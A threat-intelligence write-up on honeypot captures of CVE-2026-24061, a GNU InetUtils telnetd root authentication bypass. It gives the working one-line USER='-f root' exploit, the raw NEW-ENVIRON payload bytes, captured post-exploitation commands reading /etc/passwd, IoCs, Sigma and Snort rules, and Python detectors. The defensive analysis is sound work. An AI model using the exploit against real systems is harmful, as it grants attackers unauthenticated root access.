- Threat Intelligence
Catching CVE-2026-24061: 11 Years of Silent Root Access
How I captured active exploitation of a critical telnetd vulnerability using a Beelzebub honeypot
Mario Candela
Founder and maintainer
TL;DR
- On January 22, 2026, my honeypot captured live exploitation attempts of CVE-2026-24061, a CVSS 9.8 vulnerability in GNU InetUtils telnetd
- The attacker used the exact technique documented in the advisory: USER environment variable injection via `-f root` to bypass authentication
- This vulnerability had been hiding in plain sight for 11 years (since 2015)
- Additional attacks from Russian infrastructure revealed automated scanning for network devices and shell escape attempts
- This demonstrates how legacy protocols continue to haunt modern infrastructure
Background
GNU InetUtils is a collection of classic network tools maintained by the GNU Project, including telnet, ftp, ping, and traceroute. While Telnet fell out of favor decades ago, replaced by SSH for secure remote access, it remains surprisingly prevalent in specific environments.
On January 20, 2026, Simon Josefsson published a security advisory on the oss-security mailing list disclosing CVE-2026-24061, an authentication bypass vulnerability that allows unauthenticated remote root access with a single command.
Credit: The vulnerability was discovered by Kyu Neushwaistein aka Carlos Cortes Alvarez.
I had deployed a custom honeypot using Beelzebub to monitor for telnet exploitation attempts. What I captured was remarkable: active exploitation attempts shortly after the public disclosure, while the vulnerability had been silently lurking in the codebase for over a decade.
The Vulnerability: CVE-2026-24061
Before diving into the honeypot data, let’s understand what makes this bug so dangerous—and so elegant in its simplicity.
Root Cause: Argument Injection via Environment Variable
The vulnerability exploits a flaw in how telnetd handles the USER environment variable when spawning the login process:
- Normal flow: When a user connects via telnet, the daemon invokes `/usr/bin/login` with the username provided during authentication.
- RFC 1572 feature: The TELNET NEW-ENVIRON option (RFC 1572) allows clients to send environment variables to the server, including the USER variable.
- Vulnerable flow: The telnetd daemon passes the USER environment variable directly to the login command without any sanitization. By setting `USER="-f root"`, the attacker injects the `-f` flag.
- The `-f` flag: In login(1), the `-f` flag means “this user is already authenticated elsewhere—skip the password check entirely.”
The Deadly One-Liner
```sh
USER="-f root" telnet -a <target_ip> 23
```
That’s it. Instant root shell. No password. No exploitation chain. No memory corruption. Just argument injection that has existed since 2015.
The Vulnerable Code
The bug resided in telnetd/utility.c:
```c
// BEFORE (vulnerable)
case 'U':
  return getenv("USER") ? xstrdup(getenv("USER")) : xstrdup("");

// AFTER (patched in 2.8)
case 'U':
  {
    char *u = getenv("USER");
    return (u && *u != '-') ? xstrdup(u) : xstrdup("");
  }
```
The fix is a single character check: if the USER value starts with `-`, reject it.
The Honeypot Setup
I deployed a Beelzebub-based honeypot configured to mimic a vulnerable GNU InetUtils telnetd instance. The honeypot exposed the standard telnet service:
| Port | Service | Version |
|---|---|---|
| 23/TCP | telnetd | GNU InetUtils 2.0 (vulnerable) |
Beelzebub example configuration:
```yaml
apiVersion: "v1"
protocol: "telnet"
address: ":23"
description: "TELNET interactive"
commands:
  - regex: "^ls$"
    handler: "bin boot dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var"
  - regex: "^ls -la$"
    handler: "total 84\ndrwxr-xr-x 21 root root 4096 Jan 15 10:30 .\ndrwxr-xr-x 21 root root 4096 Jan 15 10:30 ..\ndrwxr-xr-x 2 root root 4096 Jan 10 08:15 bin\ndrwxr-xr-x 3 root root 4096 Jan 10 08:15 boot"
  - regex: "^whoami$"
    handler: "root"
  - regex: "^id$"
    handler: "uid=0(root) gid=0(root) groups=0(root)"
  - regex: "^uname$"
    handler: "Linux"
  - regex: "^uname -a$"
    handler: "Linux telnet-server 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux"
  - regex: "^uname -m$"
    handler: "x86_64"
  - regex: "^cat /etc/passwd$"
    handler: "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nuser:x:1000:1000:user:/home/user:/bin/bash"
  - regex: "^(.+)$"
    handler: "bash: command not found"
serverVersion: "Linux telnetd"
serverName: "telnet-server"
passwordRegex: "^(root|admin|password|123456|telnet|guest|cisco|oracle)$"
deadlineTimeoutSeconds: 60
```
Timeline of the Attacks
January 20, 2026 — Public Disclosure
Simon Josefsson publishes the security advisory on oss-security mailing list, including:
- Detailed vulnerability analysis
- Affected versions (1.9.3 through 2.7)
- The one-liner exploit command
- Patch commits (fd702c02 and ccba9f74)
January 22, 2026, 10:23:17 UTC — CVE-2026-24061 Exploitation Begins
Phase 1: Connection Establishment
```text
Trying IP...
Connected to IP.
Escape character is '^]'.
```
The attacker establishes a standard telnet connection.
Phase 2: Environment Variable Injection
During the TELNET option negotiation (IAC), the attacker sends:
```text
IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SE
```
Phase 3: Authentication Bypass
The login process receives:
```text
/usr/bin/login -h <client_ip> -f root
```
With -f root, authentication is skipped entirely.
Phase 4: Post-Exploitation Reconnaissance
```json
{
  "DateTime": "2026-01-22T10:23:19Z",
  "Commands": [
    "id",
    "whoami",
    "uname -a",
    "cat /etc/passwd"
  ]
}
```
Classic fingerprinting sequence to confirm root access and identify the system.
Attack Source
| Attribute | Value |
|---|---|
| Source IP | 5.130.235[.]96 |
| Reverse DNS | l5-130-235-96.novotelecom.ru |
| CIDR | 5.130.0.0/16 |
| Country | Russian Federation |
| ASN | AS31200 (Novotelecom) |
Payload Analysis
CVE-2026-24061 — Exact Match with Advisory
The captured payload matches the documented exploit technique precisely:
| Element | CVE Documentation | Captured Payload |
|---|---|---|
| Environment Variable | USER | USER |
| Injected Value | -f root | -f root |
| Telnet Flag | -a (auto-login) | IAC NEW-ENVIRON |
| Target User | root | root |
Attack Variations Observed
Over 72 hours of monitoring, I observed multiple variations:
| USER Value | Target | Frequency |
|---|---|---|
| -f root | root | 80% |
| -f admin | admin | 12% |
| -f ubuntu | ubuntu | 8% |
The attackers are targeting common privileged usernames, with overwhelming focus on root.
Spray Pattern
The attack sessions exhibited consistent patterns:
- Rapid succession: Multiple connection attempts within seconds
- No reconnaissance: Direct exploitation without version fingerprinting
- Automated behavior: Identical timing, identical payload structure
- Wide net: Targeting multiple usernames per session
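The frequency table and the spray pattern above are the kind of summary a defender wants to compute automatically from honeypot logs. The following Python is an added example, not Beelzebub's code and not the author's captured data: it takes session records (timestamp, source IP, USER value as sent via NEW-ENVIRON) and produces the share of each injected USER value, the sources that connect in rapid bursts (several connections inside a 10-second window), and the distinct usernames each source tried. The record layout and the sample sessions are constructed, with IPs from documentation ranges.

```python
"""Summarise honeypot telnet sessions: share of each injected USER value,
sources that connect in rapid bursts, and usernames tried per source.

Added example for this write-up, not Beelzebub code. The record layout and
the sample sessions are constructed; the IPs are documentation ranges."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample records, not captured data.
SESSIONS = [
    {"ts": "2026-01-22T10:23:17Z", "src": "192.0.2.10", "user": "-f root"},
    {"ts": "2026-01-22T10:23:19Z", "src": "192.0.2.10", "user": "-f admin"},
    {"ts": "2026-01-22T10:23:21Z", "src": "192.0.2.10", "user": "-f ubuntu"},
    {"ts": "2026-01-22T11:05:00Z", "src": "198.51.100.7", "user": "-f root"},
    {"ts": "2026-01-22T11:40:00Z", "src": "198.51.100.7", "user": "-f root"},
    {"ts": "2026-01-22T12:00:00Z", "src": "203.0.113.5", "user": "alice"},
]


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def injected_user_share(sessions) -> dict:
    """Percentage of injection attempts per USER value (values with a leading
    '-'); ordinary usernames are excluded from the denominator."""
    injected = Counter(s["user"] for s in sessions if s["user"].startswith("-"))
    total = sum(injected.values())
    return {u: round(100 * n / total) for u, n in injected.items()} if total else {}


def burst_sources(sessions, min_conns: int = 3, window=timedelta(seconds=10)) -> dict:
    """Source IPs with at least min_conns connections inside one window;
    maps each such IP to the largest connection count seen in any window."""
    by_src = defaultdict(list)
    for s in sessions:
        by_src[s["src"]].append(parse_ts(s["ts"]))
    bursts = {}
    for ip, times in by_src.items():
        times.sort()
        best = start = 0
        for end in range(len(times)):
            # keep the window strictly shorter than `window` (the "<10 seconds" pattern)
            while times[end] - times[start] >= window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_conns:
            bursts[ip] = best
    return bursts


def usernames_per_source(sessions) -> dict:
    """Distinct USER values tried by each source (the 'wide net' pattern)."""
    seen = defaultdict(set)
    for s in sessions:
        seen[s["src"]].add(s["user"])
    return {ip: sorted(users) for ip, users in seen.items()}


if __name__ == "__main__":
    print(injected_user_share(SESSIONS))
    print(burst_sources(SESSIONS))
    print(usernames_per_source(SESSIONS))
```

With the constructed records, 192.0.2.10 is reported as a burst source (three connections in four seconds, each with a different username), while 198.51.100.7 is not, because its two connections are 35 minutes apart.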
Threat Actor Profile
CVE-2026-24061 Attackers (Aggregated from Multiple Sessions)
| Attribute | Values Observed |
|---|---|
| Unique IPs | 40 |
| Top Geolocations | Russia, China, Netherlands, US |
| Top ASNs | AS212238 (Datacamp), AS14061 (DigitalOcean), AS45090 |
| Network Type | VPN/Proxy services, Cloud providers |
Indicators of Compromise (IoCs)
Network IoCs
```text
# Suspicious telnet connections
- Destination Port: 23/TCP
- NEW-ENVIRON with USER starting with "-"

# Malicious IP addresses
- 5.130.235.96 (Novotelecom, Russia)

# ASNs to monitor (high scanner activity)
- AS212238 (Datacamp Limited)
- AS14061 (DigitalOcean)
- AS31200 (Novotelecom)

# Traffic patterns
- Multiple telnet connections from same IP in <10 seconds
- IAC SB NEW-ENVIRON containing "-f"
- Sequential "enable", "linuxshell", "system", "shell" commands
```
Telnet Session Signatures
```text
# Malicious USER environment variable patterns
USER=-f root
USER=-f admin
USER=-f *

# IAC negotiation pattern (hex)
FF FA 27 00 00 55 53 45 52 01 2D 66 20 72 6F 6F 74 FF F0
# Decoded: IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SE
```
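Because the signatures in this section key on raw IAC bytes, it helps to see the decoding carried out in code. The following Python is an added example, not part of the original post and not GNU InetUtils or Beelzebub code: it walks a TELNET byte stream, extracts NEW-ENVIRON subnegotiations (handling the doubled-IAC escape from RFC 854 and the ESC escape from RFC 1572), parses them into variable/value pairs and flags any USER value with a leading dash, which is the same test the 2.8 patch applies before handing the value to login. The sample streams are constructed; one of them is the hex signature above wrapped in a WILL NEW-ENVIRON offer.

```python
"""Decode TELNET NEW-ENVIRON subnegotiations and flag USER values that
login(1) would parse as an option, the CVE-2026-24061 pattern.

Added example for this write-up; not GNU InetUtils or Beelzebub code.
Constants follow RFC 854 (IAC, SB, SE) and RFC 1572 (NEW-ENVIRON codes)."""
from typing import Optional

IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEW_ENVIRON = 0x27                    # TELNET option 39
IS, SEND, INFO = 0x00, 0x01, 0x02     # NEW-ENVIRON subcommands
VAR, VALUE, ESC, USERVAR = 0x00, 0x01, 0x02, 0x03


def extract_subnegotiations(stream: bytes) -> list:
    """Return the payload between IAC SB and IAC SE for each subnegotiation.
    A doubled 0xFF inside a subnegotiation is an escaped literal 0xFF."""
    subs, i = [], 0
    while i < len(stream) - 1:
        if stream[i] != IAC or stream[i + 1] != SB:
            i += 1                    # ordinary NVT data or a 3-byte option command
            continue
        i += 2
        payload = bytearray()
        while i < len(stream):
            if stream[i] != IAC:
                payload.append(stream[i])
                i += 1
            elif i + 1 < len(stream) and stream[i + 1] == IAC:
                payload.append(IAC)   # IAC IAC -> literal 0xFF
                i += 2
            else:
                # IAC SE terminates the subnegotiation; any other IAC command
                # here (or a truncated stream) is malformed, so stop.
                if i + 1 < len(stream) and stream[i + 1] == SE:
                    i += 2
                break
        subs.append(bytes(payload))
    return subs


def parse_new_environ(payload: bytes) -> Optional[dict]:
    """Parse a NEW-ENVIRON IS/INFO payload into {name: value}.
    Returns None for other options or for a server-side SEND request."""
    if len(payload) < 2 or payload[0] != NEW_ENVIRON or payload[1] not in (IS, INFO):
        return None
    env = {}
    name = value = target = None

    def commit():
        if name is not None:
            env[name.decode("latin-1")] = value.decode("latin-1") if value is not None else ""

    i = 2
    while i < len(payload):
        b = payload[i]
        if b in (VAR, USERVAR):       # start of a new variable name
            commit()
            name, value = bytearray(), None
            target = name
        elif b == VALUE and name is not None:
            value = bytearray()
            target = value
        elif target is not None:
            if b == ESC and i + 1 < len(payload):   # ESC escapes the next byte
                i += 1
                b = payload[i]
            target.append(b)
        i += 1
    commit()
    return env


def flag_user_injection(stream: bytes) -> list:
    """USER values that start with '-', i.e. what login(1) would take as an
    option; the same leading-dash test that the inetutils 2.8 fix applies."""
    hits = []
    for sub in extract_subnegotiations(stream):
        env = parse_new_environ(sub)
        if env and env.get("USER", "").startswith("-"):
            hits.append(env["USER"])
    return hits


# Constructed sample streams. CAPTURED is the hex signature from the write-up
# preceded by a WILL NEW-ENVIRON offer; BENIGN carries an ordinary username.
CAPTURED = bytes.fromhex(
    "FF FB 27"
    "FF FA 27 00 00 55 53 45 52 01 2D 66 20 72 6F 6F 74 FF F0"
)
BENIGN = bytes.fromhex("FF FA 27 00 00 55 53 45 52 01 61 6C 69 63 65 FF F0")

if __name__ == "__main__":
    for label, stream in (("captured", CAPTURED), ("benign", BENIGN)):
        envs = [parse_new_environ(s) for s in extract_subnegotiations(stream)]
        print(label, envs, "flagged:", flag_user_injection(stream))
```

Matching on the decoded USER value rather than on the raw bytes `2D 66` avoids misses when the client escapes bytes or sends the variable as USERVAR instead of VAR, and it keeps the alert condition identical to the condition the patched daemon enforces.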
Detection Rules (Sigma)
```yaml
title: GNU InetUtils telnetd CVE-2026-24061 Exploitation Attempt
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
status: experimental
description: Detects exploitation attempts of CVE-2026-24061 authentication bypass
references:
  - https://www.openwall.com/lists/oss-security/2026/01/20/2
  - https://nvd.nist.gov/vuln/detail/CVE-2026-24061
logsource:
  category: network_connection
  product: zeek
detection:
  selection_port:
    dst_port: 23
  selection_payload:
    payload|contains:
      - 'USER=-f'
      - '-f root'
      - '-f admin'
  condition: selection_port and selection_payload
falsepositives:
  - Legitimate telnet usage with unusual environment variables (extremely rare)
level: critical
tags:
  - attack.initial_access
  - attack.t1190
  - attack.privilege_escalation
  - attack.t1548
  - cve.2026.24061
```
Snort/Suricata Rules
```text
alert tcp any any -> any 23 (msg:"CVE-2026-24061 telnetd auth bypass attempt";
  content:"|FF FA 27|"; content:"USER"; content:"-f "; within:20;
  classtype:attempted-admin; sid:2026024061; rev:1;)
```
Key Findings
1. Rapid Weaponization
Shortly after the public disclosure, active exploitation was already underway. Critical vulnerabilities with published PoCs are weaponized almost immediately.
```text
Jan 20, 2026 → Advisory published on oss-security
      ↓
Jan 22, 2026 → Active exploitation detected
```
2. The 11-Year Ghost
This vulnerability was introduced in 2015 with a commit that added dynamic username handling (the %U template) for auto-login support. For over a decade, anyone who knew about RFC 1572 environment variables could have achieved instant root on millions of systems.
```text
2015 → Vulnerable code introduced (inetutils 1.9.3)
  ↓
11 years of silent exposure
  ↓
2026 → Finally discovered and patched
```
3. Legacy Protocol, Modern Risk
Despite being “obsolete,” telnet remains prevalent in:
- Industrial Control Systems (ICS/OT): Legacy SCADA systems, PLCs
- Network Equipment: Routers, switches, load balancers
- Embedded Systems: Medical devices, industrial sensors
- Consumer Devices: Routers, cameras, NAS systems
4. Mass Scanning Infrastructure
The attack pattern indicates large-scale, automated campaigns. Attackers are scanning the entire internet for port 23, then immediately attempting multiple exploitation techniques without version checking—a spray-and-pray approach that works because the exploits are so simple.
Exposure Analysis
Shodan Statistics
Based on current Shodan data:
| Metric | Value |
|---|---|
| Devices with port 23 open | ~220,000+ globally |
| Historical peak | ~10 million (2017) |
| Trend | Declining but persistent |
Recommendations
For OT/ICS Environments
- Network segmentation — Isolate legacy devices that require telnet
- Jump hosts — Require authentication through hardened bastion hosts
- Monitor — Deploy network detection for CVE-2026-24061 signatures
- Document — Inventory all telnet-dependent systems for eventual replacement
For Defenders
- Deploy honeypots — Gain early warning of exploitation attempts
- Implement the Sigma/Snort rules provided above
- Monitor AS212238, AS31200 and other known scanner infrastructure
- Block or alert on any NEW-ENVIRON with USER starting with `-`
Conclusion
This case study demonstrates several critical lessons:
The value of honeypots: By deploying a simple telnetd honeypot with Beelzebub, I captured real-world exploitation data shortly after disclosure, including exact payloads, attacker infrastructure, and behavioral patterns.
Legacy protocols are ticking time bombs: A vulnerability can hide in “obsolete” code for over a decade. Just because a protocol is deprecated doesn’t mean it’s not running somewhere in your infrastructure.
Simplicity kills: CVE-2026-24061 requires no exploit development, no shellcode, no memory corruption techniques. It’s a one-liner that grants root. These “boring” vulnerabilities are often the most dangerous because they’re trivial to exploit at scale.
The window is closing: With PoC code public and automated scanning underway, any exposed telnetd instance is likely already compromised or will be soon. The time to act was yesterday.